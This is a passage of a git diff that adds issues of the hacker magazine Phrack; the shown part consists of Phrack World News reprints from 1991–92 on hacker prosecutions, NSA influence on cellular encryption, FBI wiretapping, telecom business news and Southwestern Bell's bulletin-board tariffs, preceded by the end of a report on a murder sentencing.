+Superior Court Judge Joseph Biafore Jr. called Farley a vicious killer who had
+"complete disregard for human life."
+
+"The defendant...killed with the attention to prove to the object of his
+unrequited love that he wasn't a wimp anymore," Biafore said.
+
+During the trial, prosecutors detailed Farley's 3 1/2-year obsessive pursuit of
+Laura Black.  He sent her more than 100 letters, followed her day and night,
+left gifts on her desk, and rifled through confidential personnel files to
+glean tidbits about her life.
+
+Despite her repeated rejections, Farley persisted and was fired in 1987 for
+harassing her.  A year later, he returned to ESL.
+
+Black, 30, was shot in the shoulder during the rampage, but survived to testify
+against Farley.  She said that about a week before the slayings, she had
+received a court order to keep him away.
+
+Farley, 43, admitted the killings but pleaded not guilty, saying he never
+planned to kill but only wished to get Black's attention or commit suicide in
+front of her for rejecting him.
+
+Farley's attorney, Gregory Paraskou, argued that Farley's judgement was clouded
+by his obsession with Black and that he was not violent before the slayings and
+likely would not kill again.
+
+But Asst. Dist. Atty. Charles Constantinides said Farley spent years preparing
+for the murder by taking target practice and buying weapons, including the
+firearms and 98 pounds of ammunition he used at ESL.
+
+The judge rejected the defense's request for a modified sentence of life in
+prison and a request for a new trial.  Under California law, Farley's death
+sentence will be automatically sent to the state Supreme Court for review.
+
+Among those in the courtroom were family members of some of the victims,
+including four who addressed the judge.
+
diff --git a/phrack37/12.txt b/phrack37/12.txt
new file mode 100644
index 0000000..cd166d5
--- /dev/null
+++ b/phrack37/12.txt
@@ -0,0 +1,563 @@
+                 Volume Four, Issue Thirty-Seven, File 12 of 14
+
+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+              PWN                                             PWN
+              PWN              Phrack World News              PWN
+              PWN                                             PWN
+              PWN       Issue XXXVII / Part Two of Four       PWN
+              PWN                                             PWN
+              PWN     Compiled by Dispater & Spirit Walker    PWN
+              PWN                                             PWN
+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+
+ Operation Sun-Devil Nabs First Suspect                       February 17, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Michael Alexander (ComputerWorld)(Page 15)
+
+  "Defendant Pleads Guilty To Possession Of Access Codes, Faces 10-year Term"
+
+The U.S. Department of Justice said last week that it had successfully
+completed its first prosecution in the Operation Sun-Devil investigation.
+
+Robert Chandler [a/k/a The Whiz Kid and former bulletin board system operator
+of the Whiz House in 619 NPA], 21, pleaded guilty in federal court in San Diego
+to a single felony for possessing 15 or more access codes, which can be used
+illegally to make toll-free telephone calls, said Scott Charney, who heads the
+Justice Department's computer crime unit in Washington, D.C.  Chandler also
+admitted to using the access codes, Charney said.
+
+Chandler will be sentenced on May 11.  The legal maximum penalty is 10 years'
+imprisonment, but federal prosecutors will probably recommend probation,
+assuming the sentencing guidelines and the judge handling the case permit it,
+Charney said.
+
+Chandler may also be required to make restitution of a still-undetermined
+amount for telephone calls made with the access code.
+
+On May 7 and 8, 1990, U.S. Secret Service and local law enforcement officials
+executed more than 20 search warrants [more like 27] in 14 cities in a
+nationwide crackdown on computer crime code called Operation Sun-Devil.
+Federal law enforcers said the raid was aimed at rounding up computer-using
+outlaws who were engaged in telephone and credit-card fraud.
+
+Approximately 42 computers and 23,000 disks were swept up in the dragnet, but
+until last week there were no indictments or convictions in the investigation.
+
+The Justice Department has been severely criticized by Computer Professionals
+for Social Responsibility (CPSR), the Electronic Frontier Foundation (EFF), and
+other advocacy groups for its handling of Operation Sun-Devil cases.  CPSR has
+charged that federal law enforcers trampled on the First and Fourth Amendment
+rights of those targeted in the raids.
+_______________________________________________________________________________
+
+ No More Fast Times For Spicoli
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Night Ranger
+
+On November 19, 1991, Spicoli was awaken by Pima County (Arizona) Sheriffs and
+some other agents in his apartment.  They showed him their search warrants,
+which was obtained under the suspicion of "Computer Fraud and/or Theft" and
+asked him to step outside.  They began dismantling his computer system, which
+ran his bulletin board called "Fast Times."  It was not a hack/phreak bulletin
+board and contained no information that would normally be construed as such.
+The main reason he ran the board was because he was writing it himself.
+
+The authorities took many items not related to his computer, including his VCR.
+He was not charged with any crimes and additionally he was informed that he
+was "free to go."  This incident is very similar to what happened with the
+hacker "Mind Rape."  Late last year, his home was raided and lots of items
+were seized, but no charges followed.
+
+Spicoli attempted to hire private legal counsel, but discovered that it was
+beyond his means financially.  Since then, he has chosen to go with the public
+defender's office.
+
+Weeks later, it was revealed that his case concerned an undisclosed, but
+presumably large amount of stolen money and he was charged with various
+felonies.  He further learned that the authorities had been monitoring him over
+a period of at least three months.  Anyone who had contact with him between
+August and November should be careful.  His computer is now in the hands of the
+government.  
+
+This is the second major bust in Arizona during the last half of 1991.  With
+people like Gail Thackeray residing there and anti-hacker companies such as
+Long Distance For Less and U.S. West it is definitely not the place for any
+kind of hacking.
+_______________________________________________________________________________
+
+ U2 Shakes Up New England Bell                                February 24, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Steve Morse (The Boston Globe)(Page 15)
+
+Irish rockers U2 left local telephone operators hasping for breath.  In an
+unprecedented move designed to thwart scalpers, tickets for U2's March 17 show
+at Boston Garden went on sale through telephone charge only -- and the result
+was a long morning for the phone company.
+
+"It was complete gridlock.  I don't know how else to describe it.  The bombed
+us right out of the water," said Joanne Waddell, a New England Telephone
+manager.  "We expected a lot of calls ... but this was unbelievable.  Our
+operators were clicking away like crazy out there."
+
+The Garden show sold out in 4 1/2 hours, said Doug Borg of Tea Party Concerts,
+adding that it took that long because there was a two-ticket limit per person
+-- another step taken to frustrate scalpers.
+
+"The demand was overwhelming.  I heard there were a half-million calls in the
+first hour," said Larry Moulter, president of Boston Garden.  The telephone
+company said exact figures were not yet available, but Moulter's information is
+consistent with a recent U2 sale in Atlanta, where more than one million calls,
+many from eager fans with automatic redial, were logged.
+
+"I don't really have a number.  It's safe to say thousands, many thousands,"
+said Peter Cronin, a spokesman for New England Telephone.  He admitted there
+were minor delays in getting a dial tone, but that it was "not a serious
+situation.  If people stayed on the line, they'd get dial tone in a few seconds."
+
+There were 100 lines selling sales for the Garden concert.  They checked for
+duplicate names, credit card numbers and addresses (to help enforce the limit
+of two per person) and caught 'some' attempts to use a card number more than
+once.
+_______________________________________________________________________________
+
+ Federal Agents Raid WCFL; Station Silenced, Forced Off Air    January 28, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Patrick Townson (Telecom Digest)
+
+In an unusual move by the Federal Communications Commission, a far southwest
+suburban radio station in the Chicago area has been forced off the air by the
+FCC which alleges illegal activity at the station.
+
+WCFL-FM (104.7), a station licensed in Morris, IL with no connection to the
+station using the same call letters in Chicago several years ago was silenced
+by FCC officials who raided the station accompanied by members of the United
+States Marshall's Office on Friday, January 24.
+
+Prompted by complaints from other broadcasters in the Chicago area, an FCC
+field inspection team on January 16 found WCFL was beaming its signal at more
+than twice its authorized power of 11,000 watts, and was using a nondirectional
+rather than directional antenna as called for in its license to operate.
+
+The effect of the violations was to broacast a more powerful signal toward
+Chicago and elsewhere, and "to increase the likelyhood of interference with
+other stations," acccording to Dan Emrick, chief of investigations for the
+FCC's office in Chicago. 
+
+The FCC had cited the station for similar offenses in 1990, and fined the
+owners $3000.  Emrick said there was no record of payment.
+
+Tim Spires is the General Manager of WCFL, and an officer of the parent company
+'MM Group' which is based in Ohio.  Neither Mr. Spires nor other officials of
+'MM Group' would make any response to the FCC action which forced the station
+off the air at 1:00 PM last Friday.
+
+Emrick said federal officers entered the station shortly before 1:00 PM and
+served the appropriate legal papers on employees on duty.  FCC staffers then
+siezed the broadcasting studio and transmitting equipment.  After giving the
+obligatory sign off message and station identification over the air, power was
+killed to the transmitter.  Employees were ordered to leave the premises, which
+was closed with a US Marshall's Seal.
+
+Emrick went on to say the station would not be allowed to return to the air
+until the station settles its account with the FCC and completes construction
+of a directional antenna.  At that point, the station would be permitted to
+operate 'in probation' while the Commission did further technical inspections,
+and the probation status would continue for an unspecified period of time
+afterward.
+
+A press release was finally issued by the 'MM Group' yesterday which said in
+part that WCFL " ... went off the air voluntarily in order to install a new
+antenna; bring their transmitter into compliance with FCC regulations and
+better serve their listening area."
+_______________________________________________________________________________
+
+ New Cellular Phones Raise A National Security Debate          February 6, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By John Markoff (New York Times)(Page D1)
+
+Advocates of privacy rights are challenging the nation's most clandestine
+intelligence-gathering agency over how much confidentiality people will have
+when communicating via the next generation of cellular telephones and wireless
+computers.
+
+The issue has emerged at meetings this week of an obscure committee of
+telecommunications experts that is to decide what kinds of protections against
+eavesdropping should be designed into new models of cellular phones.  People
+concerned with privacy are eager to incorporate more potent scrambling and
+descrambling codes in equipment to prevent the eavesdropping that is so easy
+and so common in the current generation of cellular phones.
+
+But privacy advocates contend that the industry committee has already decided
+not to adopt the maximum level of protection because of pressure from the
+National Security Agency, whose intelligence gathering includes listening in on
+phone conversations in foreign countries and intercepting data sent by
+computers.  The privacy-rights faction contends that the security agency
+opposes codes that are hard to crack because the equipment might be used
+overseas.
+
+"The NSA is trying to weaken privacy technology," said Marc Rotenberg,
+Washington director of Computer Professionals for Social Responsibility, a
+public advocacy group organized by computer scientists and engineers.  "At
+stake is nothing less than the future of our privacy in the communications
+world."
+
+The standards setting group is made up of cellular telephone equipment
+manufacturers and service providers.
+
+The National Security Agency is the Defense Department Agency in charge of
+electronic intelligence gathering around the world for use by many other
+branches of the government.  Officials of the agency, who have been
+participating in the meetings as observers, said their only interest in the
+matter was insuring that the government's own secure telephones were compatible
+with the new cellular phones.  They said that agency officials have
+specifically been told not to participate in the standards-setting effort, and
+indeed some engineers attending the meetings said they have felt no outside
+pressure.
+
+But other engineers involved in the standards process said the agency's
+presence had loomed large in earlier technical meetings during the past two
+years.  "I would talk to people and they would say, 'The NSA wouldn't like
+this, or wouldn't like that,'" said one committee member, who spoke on the
+condition that he not be identified.
+
+The Agency's Long Reach
+
+The debate is important, the privacy advocates say, not just for cellular
+phones but for many other emerging technologies that communicate using radio
+signals, which are easier to intercept than information sent over conventional
+telephone lines.  These include wireless "personal communicators" that transmit
+and receive data, and portable "notebook" computers.
+
+But the dispute also illustrates that even as the cold war ebbs, the
+National Security Agency is still wielding influence over many United States
+high-technology industries.  Indeed, executives from a number of high-
+technology companies say the agency is hampering their efforts to compete for
+business overseas by forcing them to make products for foreign markets that are
+different from products sold domestically.
+
+The agency exercises this power in evaluating some of the applications by
+companies to export high-technology products.  In that role, critics say, the
+agency has opposed exports of equipment fitted with advanced encryption systems
+that are increasingly vital to modern business.
+
+Buyers Can Shop Elsewhere
+
+The agency's critics say it is almost impossible to contain the proliferation
+of encryption technologies and that customers who are deterred from buying it
+in the United States will simply shop abroad or steal the technology.
+
+"The notion that you can control this technology is comical," said William H.
+Neukom, vice president for law and corporate affairs at Microsoft Corporation,
+the big software publisher.
+
+Critics also say that it is ludicrous that encryption systems used in popular
+software programs receive the type of Government scrutiny that might be
+expected for weapons.  "The notion that our our products should be classified
+as munitions, and treated that way just doesn't make sense at all," Mr. Neukom
+said.
+
+Privacy advocates have also challenged the committee's intention not to publish
+the algorithm on which the encryption technology is based.  Traditionally,
+cryptographers have said that the best way to ensure that encryption techniques
+work is to publish the formulas so they can be publicly tested.
+
+The committee has said that it will not disclose the formula because it does
+not want to criminals an opportunity to crack the code.  But publishing the
+formula is only a danger only if the formula is weak, said John Gilmore, a
+Silicon Valley software designer, and privacy advocate.  If the formula is
+strong, disclosing it publicly and letting anyone try to crack it would simply
+prove it works.
+
+The code, however, is simple to break, say a number of engineers who have
+examined it.  Several committee members said they realized that the security
+agency would never permit the adoption of an unbreakable privacy scheme.
+
+"The cynics in the bar would say that you're never going to get anything by the
+NSA that they can't crack trivially anyway," said Peter Nurse, chairman of the
+authentication and privacy subcommittee of the standards committee and an
+engineer at Hughes Network Systems.
+
+NSA Role Denied
+
+But a number of engineers who worked on the technical standard insist that the
+agency has had no overt role in setting it.  "The standard was based on the
+technical deliberations of some of the best experts in North America," said
+John Marinho, chairman of the standards committee and an executive at AT&T.  He
+said the committee relied on the NSA only for guidance on complying with United
+States regulations.
+
+He also said that the new standard would offer far more privacy protection than
+is available under the present cellular telephone system.  Today, although it
+is against the law to eavesdrop on a cellular telephone conversation, many
+individuals modify commercial radio scanners so they can receive the
+frequencies on which cellular calls are transmitted.
+_______________________________________________________________________________
+
+ FBI Eavesdropping Challenged                                 February 17, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ Taken from The Washington Post
+
+WASHINGTON -- Cellular telephones and other state-of-the art telecommunications
+technology are seriously challenging the FBI's ability to listen to the
+telephone conversations of criminal suspects, law enforcement officials say.
+The FBI is seeking $26.6 million next year to update its eavesdropping
+techniques.  Normally tight-lipped FBI officials become even more closed-
+mouthed when the subject of investigative "sources and methods" comes up.  But
+a review of the bureau's 1993 budget request provides an unusual glimpse into
+the FBI's research on electronic surveillance and its concerns about new
+technologies.
+
+"Law enforcement is playing catchup with the telecommunications industry's
+migration to this technology," said the FBI's budget proposal to Congress. "If
+electronic surveillance is to remain available as a law enforcement tool,
+hardware and software supporting it must be developed."
+
+The new technologies include digital signals and cellular telephones.  At the
+same time, there has been an increase in over-the-phone transmission of
+computer data, which can be encrypted through readily available software
+programs, say industry experts and government officials.
+
+The FBI's five-year research effort to develop equipment compatible with
+digital phone systems is expected to cost $82 million, according to
+administration figures.
+
+The FBI effort is just a part of a wider research program also financed by the
+Pentagon's secret intelligence budget, said officials who spoke on condition of
+anonymity.
+
+Electronic surveillance, which includes both telephone wiretaps and microphones
+hidden in places frequented by criminal suspects, is a key tool for
+investigating drug traffickers as well as white-collar and organized crime.
+
+Conversations recorded by microphones the FBI placed in the New York City
+hangouts of the Gambino crime family are the centerpiece of the government's
+case against reputed mob boss John Gotti, now on trial for ordering the murder
+of his predecessor, Paul Castellano.
+
+Taps on the phones of defense consultants provided key evidence in the Justice
+Department's long running investigation of Pentagon procurement fraud, dubbed
+"Operation Ill Wind."  But with the advent of digital phone signals, it is
+difficult to unscramble a single conversation from the thousands that are
+transmitted simultaneously with computer generated data and images, industry
+officials said.
+
+"In the old days all you had to do was take a pair of clip leads and a head
+set, put it on the right terminal and you could listen to the conversation,"
+said James Sylvester, an official of Bell Atlantic Network Services Inc.  But
+digital signal transmission makes this task much more difficult.  Conversations
+are broken into an incoherent stream of digits and put back together again at
+the other end of the line.
+
+John D. Podesta, a former counsel to the Senate Judiciary's law and technology
+subcommittee, said the FBI and other law enforcement agencies are simply
+victims of a technological revolution.  For more than 50 years the basic
+telephone technology remained the same.
+_______________________________________________________________________________
+
+ Nynex Will Go On-line With Listings                          February 20, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Adam M. Gaffin (adamg@world.std.com)(Middlesex News, Framingham, MA)
+
+You can now let your fingers do the walking electronically through the Yellow
+Pages.
+
+Nynex yesterday announced an online Yellow Pages available to anyone with a
+computer and modem, becoming the first regional Bell operating company to offer
+an electronic Yellow Pages database.  The 1984 court order that broke up AT&T
+had barred such efforts, but that provision was overturned last year. 
+
+The service, at least at first, will offer listings only, rather than ads, from
+close to 300 Nynex directories -- the company serves most of New York and New
+England, except for Connecticut.
+
+Users will also be able to scan UPI news and financial information, according
+to Kurt Roessner, president of Nynex Information Technologies, the subsidiary
+that will run the service.  Ultimately, the company hopes to begin offering and
+displaying Yellow Pages-like ads to users, Roessner said yesterday.
+
+Users will require special software to access the information through the
+Minitel network, a French system that has so far failed to catch on in the U.S.
+Nynex will provide the software for free to users of MS-DOS, Macintosh, Apple
+II and Commodore computers, Roessner said.
+
+Roessner said Nynex eventually hopes to offer the service on other, more
+popular computer networks.  Minitel was chosen because Nynex has offered its
+Yellow Pages information to French subscribers for almost two years, he said.
+
+Nynex will charge 61 cents a minute -- $36.60 an hour -- the same as French
+users pay.  However, Roessner acknowledged this may be more than Americans are
+willing to pay and that the company will look at lowering the rate.
+
+CompuServe, the nation's largest consumer-oriented computer network, charges
+$12.80 an hour -- but drops that to just 50 cents an hour to people who use an
+AT&T directory of national toll-free numbers.
+
+The Nynex project is the latest in a series of efforts by large companies to
+sell information to consumers via computer.  Some, such as an effort by Knight-
+Ridder in the mid-1980s, have ended in spectacular failure.  Last year, Nynex
+dropped its own information "gateway" service after losing several million
+dollars.  CompuServe and several other online services, however, reportedly
+earn sizable profits.
+
+Phone-company information services have been surrounded by controversy.
+Opponents, who include organizations representing newspaper publishers, say it
+is unfair to allow a company that provides the means of distribution to also
+offer services -- a common comparison is to a turnpike authority that also ran
+a trucking company.
+
+Roessner, however, said he hopes the phone company can cooperate with, rather
+than fight, other potential "information providers."  He said he has already
+talked with officials at a number of newspapers who seem more willing to work
+with the phone company on joint projects than their national organizations
+would let on.
+_______________________________________________________________________________
+
+ Civil Jury Rules Against AT&T in Patent Violation Case        February 9, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Paul Deckelman (United Press International/UPI)
+
+NEW YORK -- A jury ruled American Telephone & Telegraph Company infringed upon
+somebody else's patent for telephone switching equipment and awarded the
+plaintiff $34.6 million, an attorney said.
+
+AT&T contends the suit is without merit and said it will appeal the verdict.
+
+The six-member jury at the federal district court in Midland, Texas, returned
+its verdict after having heard six days of testimony in the case, brought
+against the telecommunications giant by Collins Licensing L.P., of Dallas.
+
+The plaintiff's lawyer, Joseph Grear, of the Chicago-based firm of Rolf
+Stadheim Ltd., held out the possibility that the total award could go
+substantially higher, due to interest accruing back to 1985.  An AT&T spokesman
+dismissed the possibility.
+
+U.S. District Court Judge Lucius Bunton is considering the jury's
+recommendation. 
+
+Grear claimed AT&T's 5ESS digital central office switching device infringed
+upon a 1976 federal patent for a "Time Space Time (TST) Switch" awarded to the
+late Arthur A. Collins.
+
+Collins was the founder of Collins Radio Co., now a division of Rockwell
+International Inc., of El Segundo, California.
+
+"Arthur Collins was a pioneer in the field of digital telecommunications.  The
+jury's verdict provides recognition of Mr. Collins' substantial research and
+development investment in, and important technical contributions to, the field
+of digital telephony," Grear said.
+
+AT&T's Network Systems division came out with the device in the early 1980s,
+using it for central-office telephone switching equipment used to route calls
+to the proper exchange and number.
+
+The suit, filed in December 1990, originally named Southwestern Bell, of
+Dallas, as a co-defendent.  That portion of the case, however, was dismissed
+when the regional telephone company argued it had not violated the patent
+because it did not make the disputed switching equipment -- it had only bought
+it from AT&T.
+
+But AT&T contends that Collins' patent was not valid.
+
+Spokesman Curt Wilson said the Federal Patent Office is currently examining the
+patent in question in a separate proceeding at the request of both AT&T and
+Collins Licensing.  "We think they will invalidate that patent and we won't
+have to pay," he said.
+
+There is no firm time frame for the anticipated Patent Office ruling.
+
+Wilson added that even if the patent is found by the government to have been
+valid, AT&T does not believe its equipment used Collins' discovery, and thus
+feels it did not infringe upon the patent.
+
+"The jury found in our favor on seven of the original eight counts of the
+suit," Wilson said, "and on the remaining claim, awarded them $34 million, 70
+times less than the amount they had originally sought."
+
+We believe this suit is totally without merit," the spokesman asserted.  "The
+patent is not valid -- and we expect the patent office to agree."
+_______________________________________________________________________________
+
+User "Bill Of Rights" Introduced                               January 23, 1992
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+TAMPA, FLORIDA.-- .The North American Directory Forum (NADF) introduced a "User
+Bill of Rights" to address security and privacy issues regarding entries and
+listings concerning its proposed cooperative public directory service.  NADF
+members also approved continuing efforts on an experimental publish directory
+pilot at their eighth quarterly meeting.
+
+The "User Bill of Rights" addresses the concerns of the individual user or the
+user's agent, and is in response to issues brought to the attention of the
+NADF.
+
+Final plans were completed for the X.500 directory pilot scheduled to begin in
+the first quarter of this year.  The pilot will be used by the NADF to validate
+its technical agreements for providing a publich directory service in North
+America.  The agreements have been recorded in standing documents and include
+the services that will be provided, the directory schema and information
+sharing required to unify the directory.  It will test the operation of X.500
+in a large-scale, multi-vendor environment.
+
+All NADF members are participating in the pilot.  The members are AT&T, Bell
+Atlantic, BellSouth Advanced Networks, Bellcore representing US West, BT North
+America, GE Information Services, IBM, Infonet, MCI Communications Corp.,
+Pacific Bell, Performance Systems International, US Postal Service and Ziff
+Communications Co.  Joining the NADF at this meeting are Canada Post
+Corporation and DirectoryNet, Inc.
+
+The NADF was founded in 1990 with the goal of bringing together major messaging
+providers in the U.S. and Canada to establish a public directory service based
+on X.500, the CCITT recommendation for a global directory service.  The forum
+meets quarterly in a collaborative effort to address operational, commercial
+and technical issues involved in implementing a North American directory with
+the objective of expediting the industry's transition to a global X.500
+directory.
+
+This quarter's meeting was hosted by the IBM Information Network, IBM's
+value-added services network that provides networking, messaging, capacity and
+consulting services.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+USER BILL OF RIGHTS (for entries and listings in the Public Directory)
+
+The mission of the North American Directory Forum is to provide interconnected
+electronic directories which empower users with unprecedented access to public
+information.  To address significant security and privacy issues, the North
+American Directory Forum introduces the following "User Bill of Rights" for
+entries in the Public Directory.  As a user, you have:
+
+I.    The right not to be listed.
+II.   The right to have you or your agent informed when your entry is created.
+III.  The right to examine your entry.
+IV.   The right to correct inaccurate information in your entry.
+V.    The right to remove specific information from your entry.
+VI.   The right to be assured that your listing in the Public Directory will
+      comply with US or Canadian law regulating privacy or access information.
+VII.  The right to expect timely fulfillment of these rights.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Scope of Intent - User Bill of Rights
+
+The North American Directory Forum is a collection of service providers that
+plan to offer a cooperative directory service in North America.  This is
+achieved by interconnecting electronic directories using a set of
+internationally developed standards known as the CCITT X.500 series.
+
+In this context, the "Directory" represents the collection of electronic
+directories administered by both service providers and private operators.  When
+an entry containing information about a user is listed in the Directory, that
+information can be accessed unless restricted by security and privacy controls.
+
+A portion of the Directory -- The Public Directory -- contains information for
+public dissemination.  In contrast, other portions of the Directory may contain
+information not intended for public access.  A user or user's agent may elect
+to list information in the Public Directory, a private directory, or some
+combination.  For example, a user might publicly list a telephone number or an
+electronic mail address, and might designate other information for specific
+private use.
+
+The User Bill of Rights pertains to the Public Directory.
+Source:  NADF, January 1992
+
diff --git a/phrack37/13.txt b/phrack37/13.txt
new file mode 100644
index 0000000..816c077
--- /dev/null
+++ b/phrack37/13.txt
@@ -0,0 +1,579 @@
+                 Volume Four, Issue Thirty-Seven, File 13 of 14
+
+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+              PWN                                             PWN
+              PWN              Phrack World News              PWN
+              PWN                                             PWN
+              PWN      Issue XXXVII / Part Three of Four      PWN
+              PWN                                             PWN
+              PWN     Compiled by Dispater & Spirit Walker    PWN
+              PWN                                             PWN
+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+
+          THE RBOC'S GREED IS AIMED AT DESTROYING OUR BULLETIN BOARDS!
+
+ Computer Users See Threat In Costs                            November 5, 1991
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Martin Rosenberg (Kansas City Star)
+
+              "Southwestern Bell Plan Portends Changes, They Fear"
+
+Some computer bulletin board operators in Missouri say they might have to shut
+down the increasingly popular computer networks if Southwestern Bell Telephone
+Company, succeeds in raising their rates.
+
+Southwestern Bell says its only trying to fairly price its services by charging
+the bulletin board operators business rates instead of residential rates.  The
+company is seeking approval for the changes from Missouri regulators.
+
+Industry experts say the issue could be the opening volley in a broad campaign
+by telephone companies to change the way consumers and businesses pay for
+electronic communications.
+
+Residential customers might one day have to pay more to use their personal
+computers and modems than they pay for voice communications, experts say.  And
+businesses might have to pay more to use fax machines.
+
+Southwestern Bell denied that it is attempting to change any rates other than
+those affecting a small number of data communications customers who should be
+switched to a flat business rate, more expensive than the residential rate.
+
+The bulletin boards, frequently operated out of homes, allow users to exchange
+messages, advice and software programs.  Many are free to use, and operators
+often get no revenue from them.  Hundreds have formed across the state in the
+last few years.
+
+Southwestern Bell's proposal is meant for only those who have set up a bulletin
+board through his or her personal computer.  Not affected are computer users
+who merely access the bulletin board computer over telephone lines.
+
+The proposal comes at a time when telephone companies' plans for information
+services have moved to center stage.
+
+The U.S. Supreme Court (as already) cleared the way for seven regional
+telephone companies, including Southwestern Bell, to start providing
+information services.  Those services could eventually compete with electronic
+bulletin boards, newspapers and data base operations such as CompuServe Inc.
+and Prodigy Services Co. (CompuServe is owned by H&R Block Inc. of Kansas
+City).
+
+Revenues for telephone-delivered information in the United States amounted to
+an estimated $750 million last year and are projected to grow to $2 billion in
+1992, according to industry sources.
+
+Southwestern Bell's proposal, if approved, would take effect by mid-November.
+
+Bulletin board operators are operating like businesses, said William Bailey,
+company district manager of rate administration for Missouri in St. Louis.
+
+"Some customers on residential lines would more appropriately be on business
+lines," Bailey said.
+
+Bailey said current business customers also would be affected.  They would be
+allowed to switch to the flat business rate ($33.55 a month in metropolitan
+Kansas City) and avoid paying a higher "information terminal service" rate
+(currently $43.60 a month), he said.
+
+Southwestern Bell mounted a similar effort to get bulletin boards under
+business rates in Texas. It later decided to allow free bulletin board services
+using three or fewer lines to continue to enjoy residential rates.
+
+That was "an enormous mistake," Bailey said. Phone companies are unable to
+monitor whether a bulletin board is collecting money from users, he added.
+
+Many Kansas City bulletin board operators are upset with Southwestern Bell's
+proposal.
+
+"If they start charging business rates, some bulletin boards will shut down,"
+said Lanny Conn, who operates a free bulletin board called SOLO-Quest.
+
+Bill Hirt, who operates the Amiga Central bulletin board for Amiga computer
+users, said he would close down if he is charged the business rate.  His
+bulletin board also is free to use.
+
+Currently, about 200 personal computer users -- some as far off as Australia
+and Sweden - call his bulletin board, he said.
+
+Conn and Hirt serve as spokesmen for the Greater Kansas City SysOps
+Association, made up of about 22 bulletin boards. (SysOps stands for system
+operators).  Hirt estimates there are 100 bulletin boards in the city; most
+have been set up as hobbies.
+
+Attorney Robin Martinez, who is representing the association, said that
+Southwestern Bell's proposal would hurt information-age pioneers.
+
+"People running bulletin boards and people using them are on the cutting edge
+of the information age," he said.
+
+Southwestern Bell wants to thin the ranks of bulletin board providers so there
+will be fewer competitors to its own offerings, he said.
+
+"To a certain extent, they are trying to get a stranglehold on information
+services," Martinez said.
+
+Bailey denied there is a link between his company's proposals and its own plans
+for information services.
+
+"I'm not getting any direction from on high to do what I am doing," he said.
+"I'm really not aware what my company intends to do in terms of information
+services."
+
+But William Degnan, a telecommunications consultant in Austin, Texas, said,
+"The majority of these folks (bulletin boards) are underpricing these services
+that Southwestern Bell would like to provide at a grander scale."
+
+Degnan had advised the group of Texas bulletin board operators who had opposed
+Southwestern Bell's efforts to charge business rates there.
+
+"I think Southwestern Bell is concerned that (it) won't be able to sell what
+other people are giving away," Degnan said.
+
+Martha Hogerty, public council representing consumers in Missouri, said after
+reviewing Southwestern Bell's filing, "This looks like anybody with a modem
+would have to be on a business rate."
+
+Most regional Bell telephone companies are now developing strategies for
+offering information services.
+
+Phone companies may soon try to get customers to pay a measured rate for data
+communications, said Howard Anderson, president of the Yankee Group of Boston.
+Under such a system, the monthly cost of data communications would increase the
+longer you are connected during the month -- like a running taxi meter.
+
+A change to metered rates would be reasonable and enable telephone companies to
+increase revenues as usage and expenses mount, he said.
+
+The average residential customer uses the phone 21 minutes a day, while a
+customer with a personal computer and modem uses a phone line an average of 62
+minutes a day, Anderson said.
+
+Anderson predicted that telephone companies may decide to offer customers high-
+speed data communications for a rate higher than voice communications.  Usage
+above a fixed number of hours would increase the size of the monthly phone
+bill, he said.
+
+To encourage use of the new line, phone companies may take steps to lower the
+quality of standard lines so that they will not cleanly carry electronic
+information, Anderson said.
+
+Bailey disagreed, saying Southwestern Bell has no plans to introduce measured
+service for voice or data communications.
+
+And, he said, "I know of no plans to degrade our service to migrate customers
+>from one service to another."
+_______________________________________________________________________________
+
+ SW Bell Tariff Called Threat to Computer Bulletin Boards     November 18, 1991
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Robert Sanford (St. Louis Post-Dispatch)
+
+A proposal by Southwestern Bell Telephone Co. to revise a tariff for telephone
+use has brought protests from owners of personal computers who use phone lines
+to operate bulletin board services for other computer owners.
+
+The bulletin board operators contend that their members - by and large -
+operate bulletin boards as a hobby and not a business.  And they contend that
+the change suggested by Bell is part of an effort by the phone company to make
+them pay business phone line rates rather than residential rates.
+
+Bulletin boards are computers with modems that can be accessed by other
+computers with modems.  The "bulletin boards" contain information that can be
+passed to other computers - information of any sort, from cooking recipes to
+games to automobile tips to computer programming.
+
+Hobby bulletin board users have common interests, said Jim Harre, coordinator
+of a bulletin board network called Network 100.  "You could say that bulletin
+board users are somewhat similar to amateur radio operators.  They are people
+using computers to communicate.  They serve a function like a bulletin board at
+a supermarket.  They pass on information.
+
+The operators see the Bell proposal as a threat to all bulletin boards.
+Increased costs would simply force some hobby boards out of existence."
+
+A list of several networks in the St. Louis area shows there are about 250
+bulletin boards in the area, said Bob Schmedake, a system operator, or "sysop",
+as they call themselves.  It is estimated that there may be that many in the
+Kansas City area.  So there are several hundred across the state.  There are
+16,000 bulletin boards listed worldwide.
+
+Although the tariff proposal has brought the issue of residential vs. business
+rates to the forefront in discussions among Missouri sysops, the proposal does
+not suggest any sort of residential rate change.  The proposal suggests that
+some users of a different sort of service called Information Terminal Service
+should be allowed to change to flat business rate.
+
+Generally, the ITS rate is $43.65, the flat business rate is $33.55 and the
+residential rate is $11.35.
+
+A definition in the phone company's existing tariffs says in part that a line
+used "more as a business than of a residence nature" should be billed at a
+business rate, said William Bailey, Southwestern Bell's district manager for
